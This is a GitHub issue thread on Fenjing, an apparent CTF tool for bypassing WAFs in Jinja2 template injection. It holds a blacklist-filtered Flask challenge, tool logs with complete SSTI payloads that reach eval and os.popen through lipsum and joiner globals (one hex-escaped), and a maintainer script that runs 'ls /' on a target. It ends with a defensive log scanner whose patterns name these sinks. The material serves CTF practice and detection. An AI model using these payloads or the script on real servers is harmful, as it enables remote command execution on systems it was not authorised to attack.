Marven11 / Fenjing

A fully automatic Jinja2 SSTI WAF-bypass script designed for CTF | A Jinja2 SSTI cracker for bypassing WAF, designed for CTF
Mozilla Public License 2.0

Filtering of "." makes the challenge unsolvable #7

Closed yuebusao closed 1 year ago

yuebusao commented 1 year ago

For example, J4thon from this year's AnXun Cup (安洵杯).

# Imports and the Flask app object are added here so the excerpt runs; the
# challenge code quoted in the issue starts at the route decorator.
from flask import Flask, request, render_template_string

SleepWalker = Flask(__name__)

@SleepWalker.route("/breakme")
def breakme():
    answer = request.args.get('cmd')
    if answer is not None:
        blacklist = ['0"', '.','"','system', 'eval', 'exec', 'popen', 'subprocess',
                    'posix', 'builtins', 'namespace', 'read', 'self', 'mro', 'base',
                    'global', 'init', 'chr', 'value', 'pop', 'import',
                    'include','request', '{{', '}}','config','=','lipsum','~','url_for']
        for i in blacklist:
            if i in answer:
                # the first blacklist entry found is echoed back instead of rendering
                answer = i
                return answer
                break  # unreachable in the original challenge code, kept as posted
    return render_template_string(answer)

If the input hits the blacklist, the matched blacklist string is echoed back. Sample output from running the program:

INFO:[payload_gen] | Great, we generate eval_func()
INFO:[payload_gen] | Great, string("__import__('os').popen('echo f3n  j1ng;')") can be '__import__(\'os\').popen(\'echo f3n  j1ng;\')'
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('echo f3n  j1ng;')")
INFO:[payload_gen] | Great, we generate os_popen_obj('echo f3n  j1ng;')
INFO:[payload_gen] | Great, we generate os_popen_read('echo f3n  j1ng;')
INFO:[form_cracker] | Input 'cmd' looks great, testing generated payload.
INFO:[form_cracker] | Test Payload Failed! Generated payloads might be useless.
INFO:[cli] | Use Ctrl+D to exit.
$>> ls
INFO:[payload_gen] | Great, string("__import__('os').popen('ls')") can be '__import__(\'os\').popen(\'ls\')'
INFO:[payload_gen] | Great, we generate eval("__import__('os').popen('ls')")
INFO:[payload_gen] | Great, we generate os_popen_obj('ls')
INFO:[payload_gen] | Great, we generate os_popen_read('ls')
INFO:[cli] | Submit payload {%set oa={}|int%}{%set la=oa**oa%}{%set lla=(la~la)|int%}{%set llla=(lla~la)|int%}{%set lllla=(llla~la)|int%}{%set ob={}|int%}{%set lb=ob**ob%}{%set llb=(lb~lb)|int%}{%set lllb=(llb~lb)|int%}{%set llllb=(lllb~lb)|int%}{%set bb=llb-lb-lb-lb-lb-lb%}{%set sbb=lllb-llb-llb-llb-llb-llb%}{%set ssbb=llllb-lllb-lllb-lllb-lllb-lllb%}{%set zzeb=llllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb-lllb%}{%set zols=lipsum|escape|urlencode|list|escape|urlencode|count%}{%set ltr={}|escape|urlencode|list|escape|urlencode|count%}{%set lea=namespace|escape|urlencode|escape|urlencode|urlencode|urlencode|count%}{%set lel=cycler|escape|urlencode|escape|urlencode|escape|urlencode|escape|urlencode|count%}{%set qo=namespace|escape|urlencode|escape|urlencode|count%}{%set bs=cycler|escape|urlencode|count%}{%set ab=namespace|escape|count%}{%set zb={}|escape|list|escape|count%}{%set t=joiner|urlencode|wordcount%}{%set b={}|escape|urlencode|count%}{%set e=(dict(a=x,b=x,c=x)|count)%}{%set l={}|escape|first|count%}{%set un=((({}|select()|trim|list)[24]))%}{%set perc=(lipsum[((({}|select()|trim|list)[24]))*2+dict(globals=x)|join+((({}|select()|trim|list)[24]))*2][((({}|select()|trim|list)[24]))*2+dict(builtins=x)|join+((({}|select()|trim|list)[24]))*2][dict(chr=x)|join](37))%}{{((((((lipsum.__globals__).__builtins__).eval)('__import__(\'os\').popen(\'ls\')')).read)())}}
.

Adding the WAF to example.py and generating a payload gives this output:

INFO:payload_gen:Great, string('read') can be '\x72\x65\x61\x64'
INFO:payload_gen:Great, we generate os_popen_read('whoami')
shell_payload="{%print((((((((joiner['\\x5f\\x5f\\x69\\x6e\\x69\\x74\\x5f\\x5f'])['\\x5f\\x5f\\x67\\x6c\\x6f\\x62\\x61\\x6c\\x73\\x5f\\x5f'])['\\x5f\\x5f\\x62\\x75\\x69\\x6c\\x74\\x69\\x6e\\x73\\x5f\\x5f'])['\\x65\\x76\\x61\\x6c'])('\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x6f\\x73\\x27\\x29\\x2e\\x70\\x6f\\x70\\x65\\x6e\\x28\\x27\\x77\\x68\\x6f\\x61\\x6d\\x69\\x27\\x29'))['\\x72\\x65\\x61\\x64'])()))%}"

Using that payload returns a 500. The reason is the doubled backslashes: the program printed the escape characters too, and after removing them the payload works. I'd like to ask the author how the program could be changed so that I can get through with just the crack parameter? Using example works as well, it's just that one-shotting it with crack feels nicer 2333.

Thanks.
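The two payload shapes quoted in this issue (the {%set ...%}|int number-building chains and the hex-escaped attribute strings) share recognisable markers. As an added example from the detection side, not part of this issue or of Fenjing, here is a small scanner that flags such requests in a web access log; the indicator names and the log lines are constructed for the example.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Indicators distilled from the payloads quoted in this issue. They are applied to each
# URL-decoded query value, which is what request.args hands to the application.
INDICATORS = {
    "jinja_delimiters": re.compile(r"\{[%{]"),
    "builtin_global_filter_chain": re.compile(r"\b(lipsum|cycler|joiner|namespace)\s*\|\s*(escape|urlencode|list|count)\b"),
    "numeric_construction": re.compile(r"\{%\s*set\s+\w+\s*=\s*\{\}\s*\|\s*int\s*%\}"),
    "dunder_access": re.compile(r"__(globals|builtins|init|import)__"),
    "hex_escaped_dunder": re.compile(r"(\\x5f){2}", re.IGNORECASE),  # \x5f\x5f spells "__"
    "code_exec_sink": re.compile(r"\b(eval|popen)\b"),
}
# Combined-log-format prefix: client ip, ident, user, timestamp, request line, status code.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Constructed sample lines: a benign request, a {%set ...%}|int number-building chain, and a
# hex-escaped attribute lookup shaped like the example.py payload in the issue.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /breakme?cmd=hello HTTP/1.1" 200 5
10.0.0.7 - - [01/Jan/2024:10:00:01 +0000] "GET /breakme?cmd=%7B%25set%20oa%3D%7B%7D%7Cint%25%7D%7B%25set%20la%3Doa**oa%25%7D HTTP/1.1" 200 1
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /breakme?cmd=%7B%25print(joiner%5B'%5Cx5f%5Cx5f%5Cx69%5Cx6e%5Cx69%5Cx74%5Cx5f%5Cx5f'%5D)%25%7D HTTP/1.1" 500 0
"""

def inspect_query(target: str) -> dict:
    """Map each query parameter to the sorted indicator names its decoded value matches."""
    hits = {}
    for name, values in parse_qs(urlsplit(target).query, keep_blank_values=True).items():
        for raw in values:
            value = unquote(raw)  # parse_qs decoded once; this also catches double encoding
            matched = {ind for ind, rx in INDICATORS.items() if rx.search(value)}
            if matched:
                hits[name] = sorted(set(hits.get(name, [])) | matched)
    return hits

def scan_log(text: str) -> list:
    """Return (client_ip, status, hits) for each line whose query looks like an SSTI probe."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, target, status = m.groups()
            hits = inspect_query(target)
            if hits:
                findings.append((ip, int(status), hits))
    return findings

if __name__ == "__main__":
    for ip, status, hits in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} {hits}")
```

Note that the hex escapes are decoded by Jinja, not by the web server, so after one round of URL decoding they are still visible to the scanner as literal \x5f sequences.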

Marven11 commented 1 year ago

Took a quick look; the following approach can automatically detect the WAF for this kind of challenge:

from fenjing import exec_cmd_payload
import requests

url = "http://aaa:.combbb"

def waf(s):
    # Prefix a marker to the candidate payload: if the blacklist is hit, the
    # server echoes only the matched entry and the marker disappears.
    r = requests.get(url, params={
        "name": "weshouldseethis" + s
    })
    return "weshouldseethis" in r.text

if __name__ == "__main__":
    shell_payload, _ = exec_cmd_payload(waf, "ls /")
    r = requests.get(url, params={
        "name": shell_payload
    })
    print(r.text)

I'll add this to Fenjing shortly.

Marven11 commented 1 year ago

OK, pip install -U fenjing should fix it. If you run into other cases that can't be solved, feel free to file them.